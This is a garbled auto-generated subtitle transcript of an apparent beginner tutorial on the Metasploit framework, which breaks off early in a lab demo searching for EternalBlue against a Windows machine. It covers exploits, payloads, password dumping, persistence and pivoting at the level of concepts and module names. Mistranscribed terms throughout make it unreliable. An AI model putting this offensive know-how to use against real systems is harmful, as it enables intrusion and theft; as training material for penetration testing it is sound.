Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:11,940 --> 00:00:14,340 I don't go back to another episode on How to Hack. 2 00:00:14,720 --> 00:00:20,240 So today we'll be discussing about misapply framework for Beginners and we'll be looking at the architecture 3 00:00:20,390 --> 00:00:22,310 or the framework of Manasquan framework. 4 00:00:22,550 --> 00:00:27,080 And look at the modules are available instead of splotchy, as well as exploit and exploitation that 5 00:00:27,080 --> 00:00:28,270 we'll use alongside Cymatics. 6 00:00:28,850 --> 00:00:33,230 And this can really accelerate the pace of how quickly we're performing our penetration testing. 7 00:00:33,230 --> 00:00:38,300 And this can be really useful and helpful, especially when we are trying to understand more about how 8 00:00:38,300 --> 00:00:44,390 we could utilize misapply to help us get access into systems, find vulnerabilities, look at exploits 9 00:00:44,390 --> 00:00:45,140 as well as Palouse. 10 00:00:45,140 --> 00:00:48,470 They're available as well on top of that to post exploitation. 11 00:00:48,470 --> 00:00:50,240 What do we do after we get into the system? 12 00:00:50,240 --> 00:00:51,590 Are we able dumble passwords? 13 00:00:51,890 --> 00:00:54,020 I'll be able to get privilege escalation. 14 00:00:54,030 --> 00:00:56,930 So again, all these are key questions that you probably have. 15 00:00:56,930 --> 00:00:58,730 You have been using metastable for a while now. 16 00:01:01,500 --> 00:01:06,210 So what exactly is a better supply framework, so that supply framework is a penetration testing platform 17 00:01:06,240 --> 00:01:11,430 that allow us to use different modules and the modules on the right, you can see a module is a standalone 18 00:01:11,430 --> 00:01:16,980 piece of code that is in some or in a lot of ways not interacted with the other modules inside that 19 00:01:17,010 --> 00:01:17,670 supply framework. 20 00:01:17,850 --> 00:01:19,320 So you could do this on yourself. 21 00:01:19,320 --> 00:01:24,530 If you look at some of the template guy about coding your own exploited coding or in modules inside 22 00:01:24,540 --> 00:01:25,360 that supply framework. 23 00:01:25,380 --> 00:01:29,910 So that's a great way to start off with a special later on when you're trying to program some of these 24 00:01:29,910 --> 00:01:30,450 features. 25 00:01:30,600 --> 00:01:34,380 And we'll definitely be uploading a video about how you could create your own modules. 26 00:01:34,530 --> 00:01:39,570 Look at some of the exploits that you could potentially look at and be able to use and upload or change 27 00:01:39,570 --> 00:01:41,550 some of the code because everything is open source. 28 00:01:41,970 --> 00:01:44,300 So play framework has two versions. 29 00:01:44,310 --> 00:01:46,290 One is the pro version. 30 00:01:46,290 --> 00:01:47,370 So you have to pay for that. 31 00:01:47,520 --> 00:01:51,060 And one that we've been looking at in a lot of tutorials have always been a free one. 32 00:01:51,390 --> 00:01:53,940 And of course, there are some limitations in terms of free one. 33 00:01:53,970 --> 00:01:58,980 So, again, if you are a full time penetration tester or you're doing a lot of security assessments, 34 00:01:58,980 --> 00:02:01,290 so highly recommended to go for a paid version. 35 00:02:01,830 --> 00:02:05,170 And of course, if you look at a bottom, we have services of medicine. 36 00:02:05,410 --> 00:02:09,660 So, again, if you look at some of the tutorials online, we could see that sometimes people would 37 00:02:09,660 --> 00:02:14,370 have to study a possible sequel in order to start running the database of services inside supply. 38 00:02:14,430 --> 00:02:19,530 So, again, this could be because of supply use, possible sequel to actually stall all this data. 39 00:02:19,590 --> 00:02:24,030 So, again, you have to start to services before you're able to kick some ass boyfriend work. 40 00:02:26,850 --> 00:02:32,460 So today, we'll cover three key points in the agenda, so first of all, is about misplay framework, 41 00:02:32,460 --> 00:02:33,090 how does it work? 42 00:02:33,360 --> 00:02:37,380 And abattoirs in terms of the margins there available for you using that display framework? 43 00:02:37,390 --> 00:02:42,810 And lastly, how can we scope and define the kind of parameters and options that we want to push into 44 00:02:42,810 --> 00:02:43,320 the system? 45 00:02:45,240 --> 00:02:49,110 So first of all, let's understand three key points as part of our supply framework. 46 00:02:49,230 --> 00:02:51,360 So the very first is vulnerability. 47 00:02:51,600 --> 00:02:56,710 We have to make sure that we want to find our vulnerability inside the system, inside the machine. 48 00:02:56,780 --> 00:02:59,710 We're trying to hack into by using exploits and so on. 49 00:02:59,730 --> 00:03:04,770 So this is the part where we have to scanning modules available in some way framework that we can utilize 50 00:03:04,950 --> 00:03:05,460 or to. 51 00:03:05,460 --> 00:03:10,770 We could also use other tools like and MAP to find out the service version of the software version that 52 00:03:10,770 --> 00:03:14,460 has those services running out to find out what kind of services are running into the system. 53 00:03:14,700 --> 00:03:20,010 So, again, if a system is fully patch, have no vulnerability and then we have to start thinking about 54 00:03:20,010 --> 00:03:23,610 zero day potential as we want to craft out our exploit inside the system. 55 00:03:23,730 --> 00:03:27,980 So, again, that could be very tedious and cumbersome and could take a really long time to develop. 56 00:03:28,710 --> 00:03:33,540 And of course, the vulnerabilities are basically areas of opportunities that we can actually hack into 57 00:03:33,540 --> 00:03:33,980 the system. 58 00:03:33,990 --> 00:03:37,860 So vulnerability will be one of the key terms that we must understand. 59 00:03:38,280 --> 00:03:39,990 And number two is in terms of exploit. 60 00:03:39,990 --> 00:03:46,020 So exploit is what happens when we are able to bypass the security mechanism inside a particular service 61 00:03:46,140 --> 00:03:47,860 or a software operating system. 62 00:03:48,090 --> 00:03:53,670 So, again, this allow us to be able to take control of the system to control the software or the services 63 00:03:53,670 --> 00:03:57,030 running inside an operating system and arbitrages payload. 64 00:03:57,030 --> 00:04:00,600 So payload is what do we do after we get into the system? 65 00:04:01,020 --> 00:04:01,850 Do we want to show? 66 00:04:02,070 --> 00:04:03,650 Do we want it to trigger a shutdown? 67 00:04:03,780 --> 00:04:09,780 So again, payload come alongside with matter supply mainly as shells to give us control of the system 68 00:04:09,780 --> 00:04:15,980 so that we can do a lot more different kind of commands, manipulation of the system as part of a supply 69 00:04:15,990 --> 00:04:16,560 framework. 70 00:04:19,250 --> 00:04:23,960 So what's the advantages of using misapply framework compared to, say, using manual way of trying 71 00:04:23,960 --> 00:04:25,090 to do penetration testing? 72 00:04:25,520 --> 00:04:28,670 So there are five key ways for us to think about in terms of the advantages. 73 00:04:28,850 --> 00:04:35,480 So one is more supply is use a lot in a lot of penetration testing tools, a lot of auditing platforms. 74 00:04:35,720 --> 00:04:41,420 And it is used extensively to test companies for your security posture very, very frequently. 75 00:04:41,420 --> 00:04:46,370 And as such, having skill set amount of supply will be very helpful for you, because whenever you're 76 00:04:46,370 --> 00:04:50,510 joining a new team of penetration testers, chances are they have Mattiske boyfriend running. 77 00:04:50,720 --> 00:04:54,080 And it will be great if you are familiar with it, because some of the interview questions could also 78 00:04:54,080 --> 00:04:55,100 come alongside with that. 79 00:04:55,820 --> 00:04:59,660 And of course, the great thing is that it simplifies complicated or complex task. 80 00:04:59,870 --> 00:05:05,330 So complex tasks, meaning that you have sequential of actions that need to be carried out as part of 81 00:05:05,330 --> 00:05:06,380 your penetration testing. 82 00:05:06,380 --> 00:05:11,600 As such, you could use manage supply scripts to also automate it for you as much as possible so you 83 00:05:11,600 --> 00:05:14,210 can simplify many of this complex task together. 84 00:05:14,420 --> 00:05:19,280 And you can also put session on a background and use your own scripts to run through and execute inside 85 00:05:19,280 --> 00:05:19,940 a current session. 86 00:05:19,980 --> 00:05:24,980 So, again, a lot of this complexity can be taken out and simplified to the user matter. 87 00:05:24,980 --> 00:05:25,370 Splotchy. 88 00:05:26,260 --> 00:05:32,080 No tree is in terms of the range of capabilities that he can use along with matter supply, because 89 00:05:32,080 --> 00:05:34,840 it is built in a old and systematic way. 90 00:05:35,020 --> 00:05:40,720 So you can think of the mortgages that are available and you have auxillary scanners and you have exploits 91 00:05:40,720 --> 00:05:42,370 and you have post exploitation. 92 00:05:42,490 --> 00:05:48,190 So all these are really segmented into many different modules, many different in terms of a cyber attack 93 00:05:48,190 --> 00:05:48,560 chain. 94 00:05:48,700 --> 00:05:51,010 How are you trying to work around a system? 95 00:05:51,010 --> 00:05:53,460 So again, all this already of all that for you. 96 00:05:53,470 --> 00:05:59,830 So it's easy for you to visualize how where you are in the attack phase, where which part of the penetration 97 00:05:59,830 --> 00:06:03,280 testing you're at and what is the next step for you in order to carry them out. 98 00:06:04,000 --> 00:06:05,770 So this is all consistent updates. 99 00:06:05,770 --> 00:06:09,330 You get a lot of updates as you run about a supply framework into your system. 100 00:06:09,340 --> 00:06:14,590 So all this updates can help troubleshoot system, make sure the system are running fine and making 101 00:06:14,590 --> 00:06:16,390 sure your exploits are working as intended. 102 00:06:16,540 --> 00:06:21,070 So, again, all these updates are great for you, especially in terms of trying to make sure that you 103 00:06:21,070 --> 00:06:23,620 can perform your penetration testing smoothly. 104 00:06:24,700 --> 00:06:28,960 And of course, the great point is there are thousands of bodies inside that a supply framework. 105 00:06:29,140 --> 00:06:33,160 And this is really helpful because all these functions have been built by many of these penetration 106 00:06:33,160 --> 00:06:33,700 testers. 107 00:06:33,790 --> 00:06:39,310 And you can use them and be able to accelerate how quickly you are performing a penetration testing 108 00:06:39,340 --> 00:06:45,490 and all these tools at and help you find out potential vulnerabilities, exploits, as well as Paillot 109 00:06:45,490 --> 00:06:51,190 so that you are able to speed up the pace of how quickly you could get into the system and generate 110 00:06:51,190 --> 00:06:56,950 those reports necessary in order to find out more things about the entity to target entity of the target 111 00:06:56,950 --> 00:06:57,550 enterprise. 112 00:07:00,100 --> 00:07:05,380 So here we got a screenshot of my display, so whenever you in colonics or if you have install it on 113 00:07:05,380 --> 00:07:08,940 your Windows operating system, all you do is enter MSF console. 114 00:07:09,200 --> 00:07:10,790 You'll be brought into this page. 115 00:07:10,810 --> 00:07:16,270 So here we can see you've got two dozen four exploits, one zero nine auxillary, three four two post 116 00:07:16,480 --> 00:07:21,550 five six four payloads, forty five Encoders, 10 and Ops and seven invasion. 117 00:07:21,560 --> 00:07:24,190 So again, a lot of modules available as part of it. 118 00:07:24,370 --> 00:07:28,840 That could be austinmer of attack as it comes to doing and performing penetration testing. 119 00:07:31,230 --> 00:07:35,640 So one of the key things I really want to share with you as the number one advice when it comes to using 120 00:07:35,640 --> 00:07:39,410 metaphore framework is to go into the help wherever you are. 121 00:07:39,780 --> 00:07:41,190 So it is an interactive shell. 122 00:07:41,190 --> 00:07:45,690 So every time you're moving from one shell to another shell or you're moving from one place to another 123 00:07:45,960 --> 00:07:51,000 inside a supply framework, go ahead and to help freely enter help whenever you have the chance to. 124 00:07:51,120 --> 00:07:56,160 And you can see all the commands available to you that you can kihn that you can enter into. 125 00:07:56,220 --> 00:08:01,230 And this is really helpful for you to get yourself familiar with the user matter supply framework. 126 00:08:01,500 --> 00:08:06,660 So over here, in this case, we enter help and we can see all the functions and features and commands 127 00:08:06,660 --> 00:08:08,230 that we can use alongside with it. 128 00:08:08,370 --> 00:08:13,110 So this is really helpful in terms of trying to get yourself familiar with the supply framework. 129 00:08:14,900 --> 00:08:20,060 So, of course, now we move on into the exploits or exploits of ranked exploits are rank in terms of 130 00:08:20,060 --> 00:08:22,910 how good they are, do actually go off the system. 131 00:08:22,920 --> 00:08:27,440 So we got a ranking of excellent, great, good, normal, average, low and manual. 132 00:08:27,890 --> 00:08:32,480 So, of course, the best option to choose from will be excellent ranking because that entry to the 133 00:08:32,480 --> 00:08:37,730 system don't crash, because if the system crashes, then that could actually alert system administrators. 134 00:08:37,890 --> 00:08:42,280 And if you're doing a penetration testing on production systems, this is highly dangerous. 135 00:08:42,440 --> 00:08:48,230 In fact, most of the time you should always go after penetration testing on the environment or where 136 00:08:48,230 --> 00:08:54,770 the systems are actually merit to a separate lab test or a virtual set up where you could actually mimic 137 00:08:54,950 --> 00:08:58,090 real life production environment and be able to do all this testing on. 138 00:08:58,100 --> 00:09:02,200 So they'll be the number one advice for whenever we're doing penetration testing. 139 00:09:02,600 --> 00:09:04,550 So of course, we got the different kind of rankings. 140 00:09:04,550 --> 00:09:10,100 So we have to choose wisely what we want to use when it comes to executing many of these payloads. 141 00:09:12,150 --> 00:09:17,340 So over here, when you do a search on exploit or you want to show exploits, it will show you the thousands 142 00:09:17,340 --> 00:09:18,560 of exploits available. 143 00:09:18,570 --> 00:09:21,490 And of course, the first one we can look at is the ID number. 144 00:09:21,510 --> 00:09:27,120 So that number of stars from one foreign country, I can from one all the way to two one and we can 145 00:09:27,120 --> 00:09:30,060 see the windows, we understand, for the Windows operating system. 146 00:09:30,070 --> 00:09:34,620 So again, it could be Eunuch's, it could be any other type of Android devices as well. 147 00:09:34,630 --> 00:09:39,460 So depending on the operating system, followed by the service on top of the operating system and from 148 00:09:39,460 --> 00:09:42,740 the service, followed by a service type of service version. 149 00:09:42,750 --> 00:09:44,360 So that could be very software driven. 150 00:09:44,640 --> 00:09:50,160 So I'll say, for example, you're using a Windows so you could be a directory, could be an easy FTP. 151 00:09:50,520 --> 00:09:55,890 And of course, followed by the date, the date when the KVI common vulnerability exposure was released, 152 00:09:56,130 --> 00:09:58,270 followed by the ranking of the exploit. 153 00:09:58,560 --> 00:09:58,880 Yes. 154 00:09:58,890 --> 00:09:59,180 No. 155 00:09:59,190 --> 00:10:05,160 And a final one is actually on the version number of the particular exploit. 156 00:10:08,650 --> 00:10:13,720 So over here, of course, so we can show options whenever we are inside a supply framework. 157 00:10:13,750 --> 00:10:19,060 So once you have selected the use of that particular exploit payload or any of those modules, you can 158 00:10:19,060 --> 00:10:19,750 enter show option. 159 00:10:19,770 --> 00:10:25,330 So show options will show you the perimeters that are needed in order to execute this particular module. 160 00:10:25,630 --> 00:10:30,070 So in this case, we're using Windows Sambi MS 17 zero one zero. 161 00:10:31,480 --> 00:10:36,610 So in this case, we got our host, we got DG Treys, we got like a Tab's down pipe and so on. 162 00:10:36,640 --> 00:10:41,840 So, again, all this some of them, if you see under Thirt column, is required. 163 00:10:42,100 --> 00:10:49,300 So requirements it's compulsory is a value that you must specify in order to use that particular module. 164 00:10:49,450 --> 00:10:54,160 And of course, on the right side, we have the description about the module and here all the description 165 00:10:54,160 --> 00:10:55,790 about a parameter and an option that you have. 166 00:10:55,930 --> 00:10:57,130 So, again, very important. 167 00:10:57,130 --> 00:11:02,690 If you need any help, go ahead and to help really to understand more about the module and all the commands 168 00:11:02,690 --> 00:11:05,200 is available for you to use as part of the module. 169 00:11:07,680 --> 00:11:11,880 Of course, this would go us into the Paillot, so what happened after you exploited in the system? 170 00:11:12,240 --> 00:11:14,490 You want to execute something you want to execute? 171 00:11:14,490 --> 00:11:17,550 Most of the time, a payload and a payload is usually a shell. 172 00:11:17,790 --> 00:11:19,980 So, again, there are a number of shells that we can choose from. 173 00:11:20,160 --> 00:11:25,580 So you see on the background, we have windows, which is the operating system, type 64 architecture, 174 00:11:25,590 --> 00:11:26,610 the platform architecture. 175 00:11:26,880 --> 00:11:30,270 And then of course, we got Shell and we got different social media protocols. 176 00:11:30,270 --> 00:11:34,680 The most popular one of all, because it gives us a lot of capabilities in terms of penetration testing, 177 00:11:34,950 --> 00:11:38,160 while we can also do and get a normal shell of windows. 178 00:11:38,380 --> 00:11:43,440 Again, this is depending on the kind of privileges you're going to get or you think that you're going 179 00:11:43,440 --> 00:11:45,600 to get as part of your penetration testing. 180 00:11:45,810 --> 00:11:48,900 But the most preferred, of course, is made a printer, but, of course, made a printer. 181 00:11:48,900 --> 00:11:54,780 Also has some of these potential items that could be detected by antivirus system or endpoint detection 182 00:11:54,780 --> 00:11:55,740 and response systems. 183 00:11:56,040 --> 00:12:01,200 So, again, all this choosing of a selection of the payload is very important as part of penetration 184 00:12:01,200 --> 00:12:07,530 testing, especially if you're trying to penetrate into systems that are highly updated. 185 00:12:07,560 --> 00:12:11,430 So, again, all these are things that you want to keep in mind when you're selecting the kind of payloads 186 00:12:11,430 --> 00:12:12,300 to go in into. 187 00:12:14,110 --> 00:12:14,740 So here we go. 188 00:12:15,250 --> 00:12:20,710 Also, middle school is a great way in terms of exploiting a system, getting to payload, which has 189 00:12:20,710 --> 00:12:24,410 a lot of functions and features in terms of post exploitation as well as exploitation. 190 00:12:24,850 --> 00:12:31,540 So in terms of privilege, escalation, uploading, downloading a files, etc., so great way, especially 191 00:12:31,540 --> 00:12:36,850 in terms of running many different kind of modules, especially when it comes to penetration testing. 192 00:12:37,150 --> 00:12:40,980 So it's one of the most preferred shell, if you could get it, without detection. 193 00:12:41,320 --> 00:12:46,130 So again, this will be a great way for you to actually try out many of these different commands. 194 00:12:46,270 --> 00:12:51,100 So, again, as device enter help the moment you're in session, and this could actually show all the 195 00:12:51,100 --> 00:12:52,720 features and commands that you want to see. 196 00:12:52,960 --> 00:12:57,250 And from there on, you'll be able to find out things that you can do Furter and things that you could 197 00:12:57,250 --> 00:12:58,090 be limited to. 198 00:12:58,270 --> 00:13:01,870 And you have to a background session and be able to run all those sexploitation. 199 00:13:03,800 --> 00:13:05,880 So, of course, this will bring us to post exploitation. 200 00:13:05,900 --> 00:13:08,940 So the question is always now, then, of exploiting the system. 201 00:13:09,380 --> 00:13:09,930 What's next? 202 00:13:10,040 --> 00:13:10,930 What do I do next? 203 00:13:11,030 --> 00:13:12,160 How do I get passwords? 204 00:13:12,260 --> 00:13:13,490 How do I get persistance? 205 00:13:13,820 --> 00:13:19,010 So, again, there are a lot of post exploitation modules available in site Matus boyfriend that can 206 00:13:19,130 --> 00:13:20,360 help you in that way. 207 00:13:20,570 --> 00:13:24,100 So, of course, is a heart attack into Target organization. 208 00:13:24,560 --> 00:13:27,170 You want to pivot from one machine to another machine. 209 00:13:27,260 --> 00:13:29,480 You want to do scanning on the environment. 210 00:13:29,690 --> 00:13:33,290 You want to find out what protocols you're using, what servers they have, what services they have 211 00:13:33,290 --> 00:13:34,280 on top of those servers. 212 00:13:34,860 --> 00:13:40,850 So, again, all these are capable in helping you actually expand the scope of your exploitation. 213 00:13:43,610 --> 00:13:45,240 So here we got post Windows Exploit. 214 00:13:45,320 --> 00:13:50,780 So, of course, you can actually do a search on post and we can actually see all the modules available 215 00:13:50,780 --> 00:13:52,150 as part of post exploitation. 216 00:13:52,180 --> 00:13:56,690 We got privilege escalation and we got dumping out of data dumping and passwords. 217 00:13:56,710 --> 00:13:59,600 So, again, all these are there for us to take a look at. 218 00:13:59,610 --> 00:14:03,950 So especially when we go into tutorial later, we can actually see many of these modules and see how 219 00:14:03,950 --> 00:14:07,540 they function and work and what kind of data we can actually pull out from the system. 220 00:14:08,000 --> 00:14:12,980 So directly from the screenshot we could see, we could look at post Windows, Manesh webcam, we can 221 00:14:12,980 --> 00:14:16,240 look at resolving IP addresses, we can look at wireless list. 222 00:14:16,250 --> 00:14:21,050 So again, all this are some of the polls exploitation now we could be using in order to find out more 223 00:14:21,050 --> 00:14:26,750 information about a system trying to get privilege escalation again, many different items and features 224 00:14:26,750 --> 00:14:27,740 that we can look into. 225 00:14:30,030 --> 00:14:34,950 So there are also a lot of auxillary modules available as part of their supply framework, so in this 226 00:14:34,950 --> 00:14:39,360 case, on the right side, we have Etman, we got crawlers, we got scanners and we got Fyssas. 227 00:14:39,570 --> 00:14:44,970 So when you go into Mazwai framework, you can search for Auxillary and you can see all this modules 228 00:14:44,970 --> 00:14:47,310 available or all these subcategories available. 229 00:14:47,310 --> 00:14:51,900 So there are a lot more subcategories that you can look at that may be outside of scope of today's lecture. 230 00:14:51,930 --> 00:14:53,880 So, again, do explore them whenever you have to. 231 00:14:53,880 --> 00:14:54,420 Time to. 232 00:14:56,160 --> 00:15:01,080 So, of course, the first one is the crawler, so Criollo actually allow us to crawl into the system, 233 00:15:01,080 --> 00:15:07,710 so allow us to crawl through Web application servers, allow us to find our subdirectory, do a crawling 234 00:15:07,710 --> 00:15:12,780 into the system, like how we deploy web crawlers from search engines and we'll go into the site deeply 235 00:15:13,050 --> 00:15:18,000 finding out things that may be accidentally being exposed to publicly available information. 236 00:15:18,360 --> 00:15:23,490 So, again, we can use MSF Criollo on that and that can help us crawl into the Web server and finding 237 00:15:23,490 --> 00:15:24,690 out all this information. 238 00:15:26,650 --> 00:15:31,390 And of course, we also got a scanner, so scanners help us scan that particular service, whether it's 239 00:15:31,390 --> 00:15:34,820 available that is vulnerable to different kind of exploits. 240 00:15:35,050 --> 00:15:40,120 So we have done a number of tutorials about using auxillary scanner where we scan the Windows 10 operating 241 00:15:40,120 --> 00:15:43,210 system to see if it was vulnerable to eternal blue. 242 00:15:43,360 --> 00:15:47,560 So, again, that could be the first step you take before you run the exploit, because if the system 243 00:15:47,710 --> 00:15:50,440 is not vulnerable, then you will not be able to exploit it. 244 00:15:50,530 --> 00:15:55,540 And then you have to start scanning for other items inside a target machine before you're able to run, 245 00:15:55,540 --> 00:15:56,170 you exploit. 246 00:15:58,950 --> 00:16:04,650 So, of course, we have to go forcing so we uploaded a new video on SQL injection that was a full tutorial 247 00:16:04,650 --> 00:16:04,970 on that. 248 00:16:04,980 --> 00:16:06,130 So that was really interesting. 249 00:16:06,570 --> 00:16:11,100 So it's fairly similar in the sense that we are trying to foster service of the system. 250 00:16:11,100 --> 00:16:17,520 We're trying to inject code into the system to break it, to get past the buffer and be able to inject 251 00:16:17,520 --> 00:16:18,590 things into the system. 252 00:16:18,600 --> 00:16:20,340 So we're trying to find software Bachs. 253 00:16:20,640 --> 00:16:26,460 So in this case, as part of the auxillary modules of fazing inside Manzoni framework, we got support 254 00:16:26,460 --> 00:16:27,510 for a different protocol. 255 00:16:27,520 --> 00:16:30,280 So we got DNS, FTP and so on. 256 00:16:30,510 --> 00:16:37,170 So again, all these are ways and areas where we can try to push and inject code into those services 257 00:16:37,260 --> 00:16:40,850 to see when we can actually find vulnerabilities inside a system. 258 00:16:40,860 --> 00:16:46,410 So a lot more manual effort in terms of checking those systems or services for vulnerabilities. 259 00:16:48,520 --> 00:16:53,470 So, of course, before we go into dictatorial, the most important question right now you have in your 260 00:16:53,470 --> 00:16:56,940 mind is how can we write our own exploding supply framework? 261 00:16:56,950 --> 00:16:59,950 So again, we are going to cover it is in subsequent tutorial. 262 00:16:59,970 --> 00:17:01,030 So stay tuned for that. 263 00:17:01,420 --> 00:17:05,780 So for now, let us go into the tutorial of going through into metastable framework. 264 00:17:06,190 --> 00:17:11,410 So on the left side of screen of colonics running and all you got to do is actually click on the terminal 265 00:17:11,410 --> 00:17:13,960 emulator and we can actually zoom in a little. 266 00:17:13,960 --> 00:17:15,100 So it's easier for you to see. 267 00:17:15,490 --> 00:17:18,020 So I can actually go in and or MSF console. 268 00:17:18,310 --> 00:17:22,630 So this will start up the amount of supply framework immediately, just like what we see on the electric 269 00:17:22,630 --> 00:17:22,980 slide. 270 00:17:23,890 --> 00:17:25,000 So I'm here on a lecture slide. 271 00:17:25,000 --> 00:17:27,450 We can see that we actually keun into MSF console. 272 00:17:27,730 --> 00:17:30,960 So over here we are starting the med supply framework console. 273 00:17:31,300 --> 00:17:35,850 So once we're in, we'll be able to see, number one, the number of exploits, auxillary modules, 274 00:17:36,130 --> 00:17:39,550 pulse exploitation payloads, encoders and no ops as well. 275 00:17:39,550 --> 00:17:40,400 Seven, evasion. 276 00:17:41,050 --> 00:17:43,880 So now once we're in, all you got to do is enter help. 277 00:17:43,990 --> 00:17:47,260 So when you enter help, it will show you all the commands available. 278 00:17:47,270 --> 00:17:53,680 So again, wherever you are in the interactive shell, it's great if you have the ability to go into 279 00:17:53,680 --> 00:17:59,260 the help page or help command and it will show you all the parameters and all the commands that you 280 00:17:59,260 --> 00:18:01,070 can actually key in into the system. 281 00:18:01,270 --> 00:18:05,860 So this is a great way to actually explore and begin exploring new supply frameworks. 282 00:18:05,860 --> 00:18:08,680 So a very important way to understand more about exploiting. 283 00:18:09,820 --> 00:18:14,350 So, of course, as demonstrated on the lecture slide, we'll be looking also, of course, at some 284 00:18:14,350 --> 00:18:20,590 other key areas in terms of exploit so you can actually enter Shole followed by exploits and you hit 285 00:18:20,590 --> 00:18:21,220 enter and debt. 286 00:18:21,430 --> 00:18:26,950 So if you enter shool and if you do a double tap on a keyboard, it will show all the options that you 287 00:18:26,950 --> 00:18:28,000 have a spot of Schull. 288 00:18:28,270 --> 00:18:32,760 So here when you see Schull, there's a show all show auxillary and codas and so on. 289 00:18:33,070 --> 00:18:36,240 So of course we can enter a show, for example, on exploits. 290 00:18:36,550 --> 00:18:40,390 So this would actually show and pull out all the exploits from the database. 291 00:18:40,540 --> 00:18:44,240 And we want to show you what exploits are available as part of a supply framework. 292 00:18:44,620 --> 00:18:48,760 So when I hit enter and is this could take some time to load because it's trying to pull all this data 293 00:18:48,760 --> 00:18:49,750 out from the database. 294 00:18:49,900 --> 00:18:52,420 So you may take a little while for the query to complete. 295 00:18:53,110 --> 00:18:59,170 So of course, likewise you could see show all you could enter, show auxillary and exploits no ops, 296 00:18:59,410 --> 00:19:01,300 show options, payloads and so on. 297 00:19:01,330 --> 00:19:06,460 So again, a very important way for us to understand about how we could actually see all the modules 298 00:19:06,460 --> 00:19:07,210 inside the system. 299 00:19:07,210 --> 00:19:11,770 So show is one of those commands that you will use extensively to actually find out modules that you 300 00:19:11,770 --> 00:19:12,600 can look out for. 301 00:19:13,270 --> 00:19:16,250 And another option that we have is also in terms of searching. 302 00:19:16,630 --> 00:19:21,070 So in terms of searching, we can also search specifically, we can search for any keywords, just like 303 00:19:21,070 --> 00:19:26,080 how you use any of the search engine so you can to search, followed by the type of payload that you 304 00:19:26,080 --> 00:19:26,860 could be looking for. 305 00:19:27,190 --> 00:19:33,250 You could be looking for anything, perhaps, for example, related to Android or anything example related 306 00:19:33,250 --> 00:19:33,880 to Apache. 307 00:19:34,060 --> 00:19:39,390 So, again, all these are things that you can actually look for as you are using Matus framework. 308 00:19:39,640 --> 00:19:41,710 So, of course, in this case, we're still waiting for this show. 309 00:19:42,080 --> 00:19:43,600 So now we have to return. 310 00:19:43,630 --> 00:19:48,760 So if you remember earlier from the lecture right over here on the right site, we have different kind 311 00:19:48,760 --> 00:19:49,820 of ratings. 312 00:19:49,820 --> 00:19:50,350 So ranking. 313 00:19:50,350 --> 00:19:55,930 So we got the rankings of excellent, great, good, normal, average, low end manuell. 314 00:19:56,260 --> 00:20:01,330 So in this case, when you enter on the show exploits, we can see normal average manuell. 315 00:20:01,330 --> 00:20:01,780 Great. 316 00:20:02,050 --> 00:20:04,540 And maybe you're looking for Excelon over here like Weisse. 317 00:20:04,540 --> 00:20:05,550 We can see it over here. 318 00:20:05,950 --> 00:20:10,090 So again, we are able to see all the modules information as part of it. 319 00:20:10,840 --> 00:20:12,940 So, of course, moving back, we can enter. 320 00:20:12,940 --> 00:20:13,420 Such as? 321 00:20:13,420 --> 00:20:13,810 Well. 322 00:20:13,810 --> 00:20:17,320 And perhaps you want to search for Android so you can search on that. 323 00:20:17,320 --> 00:20:20,220 And it was show you all the different modules available. 324 00:20:20,230 --> 00:20:25,500 So if you scroll all the way up is actually over here, we can see Auxillary as the type of modules 325 00:20:25,510 --> 00:20:26,350 we're looking for. 326 00:20:26,380 --> 00:20:29,290 And now we have the administrator, Android, Google Play store. 327 00:20:29,650 --> 00:20:32,920 And of course, we got a ranking disclosure data as a CSV exploit. 328 00:20:33,370 --> 00:20:36,540 And of course, on the right side, we have a description of the particular module. 329 00:20:37,150 --> 00:20:41,080 So as you scroll down, we can see the different kind of auxillary modules are available for you to 330 00:20:41,080 --> 00:20:41,480 use. 331 00:20:41,710 --> 00:20:46,090 So we have Gater, we have Geter, we got a scanner again, we got a server. 332 00:20:46,630 --> 00:20:50,950 And of course, as you scroll down, we have exploit exploit, followed by the operating system type. 333 00:20:51,370 --> 00:20:56,410 And then the major category followed by the subcategory are the name of the particular service that 334 00:20:56,410 --> 00:20:57,470 we're exploiting into. 335 00:20:57,730 --> 00:20:59,740 So here we got the Android debark breech. 336 00:20:59,740 --> 00:21:06,040 So we actually show Android Buckeridge the past few videos about how we could actually be able to exploit 337 00:21:06,040 --> 00:21:06,190 them. 338 00:21:06,220 --> 00:21:08,020 So, again, really, really useful on that. 339 00:21:08,380 --> 00:21:14,410 So because Stagefright MP four, so this is a way for actually the user to execute AMP for video file 340 00:21:14,620 --> 00:21:16,340 and you gain complete control of the system. 341 00:21:16,660 --> 00:21:20,560 So again, many exploits for us to actually try and test out on. 342 00:21:20,770 --> 00:21:24,250 It's a great way for us to understand more about a system operating system question. 343 00:21:24,640 --> 00:21:26,260 And of course, we've got a different kind of payloads. 344 00:21:26,950 --> 00:21:28,840 So payloads are basically giving us shell. 345 00:21:29,080 --> 00:21:31,030 So we got a normal android shell. 346 00:21:31,030 --> 00:21:34,030 And of course, we also got meta preta shell over here that you can see. 347 00:21:34,030 --> 00:21:37,640 So reverse TCP reverse ETPs. 348 00:21:37,930 --> 00:21:41,050 And of course we've got post exploitation as part of the operating system. 349 00:21:41,050 --> 00:21:44,710 So we've got post Android Geter trying to dump all hash values. 350 00:21:45,160 --> 00:21:47,020 We're trying to get some information. 351 00:21:47,140 --> 00:21:51,460 We are trying to get wireless access point information, so again, also not a great one, removing 352 00:21:51,460 --> 00:21:53,500 a lock from the remote device lock. 353 00:21:53,540 --> 00:21:58,300 So, again, many different impulse exploitation that we can look at as part of media supply framework. 354 00:21:59,920 --> 00:22:04,660 So moving forward, of course, we have seen all of the exploits and of course, over here we can also 355 00:22:04,660 --> 00:22:05,740 use exploits. 356 00:22:06,070 --> 00:22:10,870 So in this case, I actually have a Windows operating system running over here so I can enter CMD. 357 00:22:10,900 --> 00:22:16,630 So this will show us the IP configuration of this particular this particular operating system. 358 00:22:16,630 --> 00:22:19,400 So we got one or two, one six eight one eight nine. 359 00:22:19,960 --> 00:22:24,610 So we are going to minimize this and that is going to be our target machine and we're going to use my 360 00:22:24,610 --> 00:22:27,060 display here to try to gain access into the system. 361 00:22:27,580 --> 00:22:32,710 So the first thing I use is perhaps I will search, I'll do a search on SMB because there is a very 362 00:22:32,710 --> 00:22:36,800 popular exploit in Windows using SMB or I could search on internal blue. 363 00:22:37,030 --> 00:22:38,660 So again, either one would be fine. 364 00:22:39,040 --> 00:22:42,040 So there's a lot of SMB over here so I can do a search on internal. 365 00:22:43,150 --> 00:22:46,530 And over here we've got five matching modules from 